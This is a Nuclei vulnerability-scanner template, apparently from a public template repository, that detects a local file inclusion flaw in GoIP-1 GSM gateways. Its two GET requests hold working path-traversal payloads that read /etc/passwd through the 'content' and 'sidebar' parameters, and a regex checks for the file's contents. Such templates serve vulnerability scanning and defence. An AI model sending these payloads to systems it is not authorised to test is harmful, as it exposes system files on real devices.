nuclei-templates/vulnerabilities/other/goip-1-lfi.yaml

25 lines
918 B
YAML

id: goip-1-lfi
info:
name: GoIP-1 GSM - Local File Inclusion
author: gy741
severity: high
description: Input passed thru the 'content' or 'sidebar' GET parameter in 'frame.html' or 'frame.A100.html' not properly sanitized before being used to read files. This can be exploited by an unauthenticated attacker
to read arbitrary files on the affected system.
reference:
- https://shufflingbytes.com/posts/hacking-goip-gsm-gateway/
- http://www.hybertone.com/uploadfile/download/20140304125509964.pdf
- http://en.dbltek.com/latestfirmwares.html
tags: gsm,goip,lfi,iot
requests:
- method: GET
path:
- "{{BaseURL}}/default/en_US/frame.html?content=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
- "{{BaseURL}}/default/en_US/frame.A100.html?sidebar=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
matchers:
- type: regex
regex:
- "root:.*:0:0:"